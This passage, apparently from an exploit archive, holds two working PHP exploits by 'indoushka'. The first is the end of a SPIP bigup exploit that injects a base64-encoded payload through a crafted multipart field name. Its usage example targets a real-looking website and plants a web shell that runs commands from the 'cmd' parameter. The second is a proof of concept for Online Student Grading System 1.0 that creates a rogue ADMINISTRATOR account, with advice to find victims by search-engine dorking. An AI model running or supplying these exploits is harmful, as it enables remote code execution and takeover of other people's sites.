/><br /> $postData = "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";<br /> $postData .= "--$boundary--\r\n";<br /><br /> $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);<br /> }<br /><br /> private function randomString($length = 8) {<br /> return bin2hex(random_bytes($length / 2));<br /> }<br />}<br /><br />// Usage example:<br />$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');<br />$exploit->check();<br />$exploit->exploit();<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Student Grading System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.campcodes.com/projects/php/online-student-grading-system/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject New Admin account. <br /><br /> 'user' => 'indoushka',<br /> 'pwd' => 'hacked',<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php target.com<br /><br />[+] payload :<br /><br /><?php<br /><br />function add_admin_user($website) {<br /> <br /> $post_fields = array(<br /> 'page' => '',<br /> 'fname' => 'nekkaa',<br /> 'lname' => 'salah eddine',<br /> 'user' => 'indoushka',<br /> 'pwd' => 'hacked',<br /> 'type' => 'ADMINISTRATOR',<br /> <br /> 'qty' => '1'<br /> );<br /><br /> $ch = curl_init();<br /> curl_setopt($ch, CURLOPT_URL, "$website/newaccount.php");<br /> curl_setopt($ch, CURLOPT_POST, 1);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "(+) Admin Add Successfully...\n";<br />}<br /><br />if ($argc != 2) {<br /> echo "(+) Usage: php " . $argv[0] . " <website URL>\n";<br /> echo "(+) Example: php " . $argv[0] . " http://example.com\n";<br /> exit(-1);<br />}<br /><br />$website = $argv[1];<br />add_admin_user($website);<br /><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>